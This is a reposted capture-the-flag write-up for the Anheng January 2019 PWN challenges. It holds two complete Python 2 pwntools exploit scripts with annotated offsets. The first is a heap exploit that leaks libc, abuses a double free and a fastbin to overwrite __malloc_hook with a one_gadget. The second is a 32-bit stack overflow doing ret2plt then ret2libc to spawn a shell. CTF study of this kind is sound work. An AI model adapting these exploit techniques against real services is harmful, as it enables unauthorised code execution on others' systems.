安恒1月赛2019 PWN (Anheng January 2019 CTF — PWN write-ups)

0x01 pwn1 (heap exploit; Python 2 / pwntools — the `print` statement and str+p64 concatenation will not run unmodified on Python 3)

from pwn import *
#context.log_level="debug"
def add(name,length,note):
    """Menu option 1: create a card.

    Walks the four prompts of the "add" flow on the module-level tube ``p``.
    ``name`` and ``note`` go through ``sendafter`` (pwntools appends no
    newline), so the caller controls the terminator and may embed NUL bytes or
    forged chunk headers verbatim; ``length`` is sent as a decimal line.
    """
    steps = (
        (p.sendlineafter, "4:exit\n", "1"),
        (p.sendafter, "Name:", name),
        (p.sendlineafter, "Len", str(length)),
        (p.sendafter, "Description:", note),
    )
    for send, prompt, data in steps:
        send(prompt, data)

def delete(index):
    """Menu option 2: free the card at ``index``.

    Both answers are sent as lines on the module-level tube ``p``.  Nothing
    here checks that the target rejected the request, so calling this twice on
    the same index is exactly what the exploit below relies on.
    """
    for prompt, data in (("4:exit\n", "2"), ("Back.\n>", str(index))):
        p.sendlineafter(prompt, data)

def edit(name,length,note,index):
    """Menu option 3: rewrite the card at ``index``.

    Same conventions as ``add``: ``name`` and ``note`` are sent raw via
    ``sendafter`` (no newline appended), ``length`` and ``index`` as decimal
    lines.  Note the prompt here is ``"Description :"`` (with a space), unlike
    the ``"Description:"`` prompt of the add flow.
    """
    steps = (
        (p.sendlineafter, "4:exit\n", "3"),
        (p.sendlineafter, "Back.\n>", str(index)),
        (p.sendafter, "?", name),
        (p.sendlineafter, "?", str(length)),
        (p.sendafter, "Description :", note),
    )
    for send, prompt, data in steps:
        send(prompt, data)
p=process("./mycard")
# Remote target used during the contest; swap in for `process` to run it live.
#p=remote("101.71.29.5",10006)

# --- Stage 1: heap layout + libc leak ---------------------------------------
# Six cards with ascending sizes.  Card 3's description embeds what look like
# forged chunk headers (size fields 0x31, 0x21, 0xb1) -- presumably to satisfy
# glibc's size/prev_inuse sanity checks when chunks around it are freed later;
# confirm against the binary's card layout.
add("1\n",0x40,"1"*0x40)
add("2\n",0x50,"2"*0x50)
add("3\n",0x60,"3"*4+p64(0x31)+"3"*32+p64(0)+p64(0x21)+p64(0)*2+p64(0)+p64(0xb1)+p32(0))
add("4\n",0x70,"4\n")
add("5\n",0x90,"555\n")
add("6\n",0x60,"666\n")
# Free card 5 (a 0x90 request is above the default fastbin limit, so the chunk
# goes to the unsorted bin and gets arena pointers in fd/bk), then reallocate
# the same size with a 2-byte description.  The short write clobbers only the
# first two bytes of fd; the listing prints the description as a C string, so
# the 7 bytes skipped below look like "\n" plus fd's tail, and the 8 bytes that
# are decoded look like the intact bk pointer.  The lone send("\n") presumably
# satisfies a prompt in the listing -- verify, it is order-sensitive.
delete(5)
add("5\n",0x90,"5\n")
p.sendlineafter("4:exit\n","2")
p.recvuntil("Description :5")
p.recv(7)
p.send("\n")
# NOTE(review): recv(8) returns *up to* 8 bytes and u64 raises on a short
# read; p.recvn(8) is the exact-length form and is more robust on a slow
# remote.  The arithmetic further down (0x3c4b10) only works if this value is
# main_arena+0x58 -- confirm on the target libc.
libc_addr=u64(p.recv(8))
print hex(libc_addr)

# --- Stage 2: rebuild the heap with "/bin/sh" in card 1, leak a heap address -
# Deleting index 1 six times drains all six cards, which only works if the
# program compacts indices on delete -- verify; the loop depends on it.
for i in range(6):
    delete(1)
add("/bin/sh\x00\n",0x40,"1"*0x40)
add("2\n",0x50,"2"*0x50)
add("3\n",0x60,"3"*4+p64(0x31)+"3"*32+p64(0)+p64(0x21)+p64(0)*2+p64(0)+p64(0xb1)+p32(0))
add("4\n",0x70,"4\n")
add("5\n",0x90,"555\n")
#add("kirin\n",0x80,"5\n")
# Card 3 is freed twice in a row -- a double free the binary evidently does
# not reject.  The listing still shows the freed record; the 6 bytes read 24
# bytes past "[3] Name :" are zero-extended to 8 (x86-64 user-space pointers
# have their top two bytes clear) and taken as a heap address.
delete(3)
delete(3)
#gdb.attach(p)
p.sendlineafter("4:exit\n","2")
p.recvuntil("[3] Name :")
p.recv(24)
heap_addr=u64(p.recv(6)+"\x00\x00")
print hex(heap_addr)
#p.recv(1024)
#add("kirin\n",4,"1234")
p.send("\n")

# --- Stage 3: steer a fastbin allocation onto __malloc_hook ------------------
# The name written into slot 3 (0xb0, 0x20, heap+0x100) looks like a forged
# card record laid over the freed chunk; the exact field meaning is not
# visible here -- confirm with the binary.  The three 0x60 allocations then
# pull chunks back out of that fastbin.
edit(p64(0xb0)+p64(0x20)+p64(heap_addr+0x100)+"\n",0x10,"kirin\n",3)
add("a\n",0x60,"b"*0x10+"\n")
add("a\n",0x60,"a"*0x10+"\n")
add("c\n",0x60,"c"*0x10+"\n")
# The trailing qword looks like a fastbin fd overwrite target.  Assuming
# libc_addr == main_arena+0x58 (what the 0x3c4b10 arithmetic below implies),
# libc_addr-0x68-0x3 == main_arena-0x13 == __malloc_hook-0x3 for a glibc
# where __malloc_hook sits 0x10 below main_arena.
edit("kirin\n",0x60,"3"*4+p64(0x31)+"3"*32+p64(0)+p64(0x21)+p64(libc_addr-0x68-0x3)+"\n",3)
#gdb.attach(p)
print hex(libc_addr-0x68-0x3)
# Three bytes of padding place the gadget exactly on __malloc_hook.
# libc_addr-0x68-0x3c4b10 is the libc base only when main_arena is at
# 0x3c4b20 in the target libc (the glibc 2.23 / Ubuntu 16.04 x86-64 layout),
# and 0xf1147 is a one_gadget for that same build -- both constants must be
# recomputed for any other libc, and the gadget's register constraints must
# hold at the time of the next malloc().
edit("a"*0x3+p64(libc_addr-0x68-0x3c4b10+0xf1147)+"\x00"*40+"\n",0x20,"\n",5)
# Any further malloc() now goes through the hook.
add("\x00"*60+"\n",0x10,"\x00"*100)
#gdb.attach(p)
p.interactive()

0x02 pwn2 (32-bit stack overflow, ret2plt leak then ret2libc; Python 2 / pwntools as above)

from pwn import *
from time import *
context.log_level='debug'

# Disabled timing loop; `now` is not defined anywhere in the visible lines, so
# re-enabling it as-is would raise NameError.
#while True:
#   if int(time())==now+3:
#      break
#p=remote("101.71.29.5",10013)
p=process("./rrr")
p.recvuntil(">\n")
# Stage 1 -- leak.  47 filler bytes plus a NUL fill 48 bytes, then 0x804a888
# (some saved value the function appears to expect at that slot -- saved ebp
# or a checked constant; not visible here), then a three-dword frame: return
# into 0x8048410 (presumably puts@plt), return address 0x8048602 (back into
# the input routine so a second payload can be sent), and 0x804a018
# (presumably puts's GOT entry) as the argument.
payload1="a"*47+"\x00"+p32(0x804a888)+p32(0x8048410)+p32(0x8048602)+p32(0x804a018)
p.sendline(payload1)
# puts() prints the GOT entry as a C string, so the first 4 bytes are the
# leaked libc address.  NOTE(review): recvuntil("\n")[:4] truncates if the
# leaked address contains 0x0a and u32() then raises on the short input;
# p.recvn(4) reads the exact width regardless.  The offsets (puts@0x5fca0,
# system@0x3ada0) are for one specific libc build; the trailing alternative
# was for another -- recompute both for any other target libc.
s=u32(p.recvuntil("\n")[:4])-0x5fca0+0x3ada0#-0x5f140+0x3a940 (alternative libc build)
# Stage 2 -- same overflow, now calling system("/bin/sh") with 0 as its return
# address; 0x15ba0b is the "/bin/sh" offset in the same libc build (0x15902b
# in the alternative).
payload1="a"*47+"\x00"+p32(0x804a888)+p32(s)+p32(0)+p32(s-0x3ada0+0x15ba0b)#-0x3a940+0x15902b (alternative libc build)
#gdb.attach(p)
p.sendline(payload1)
p.interactive()


转载自blog.csdn.net/weixin_34168700/article/details/87680504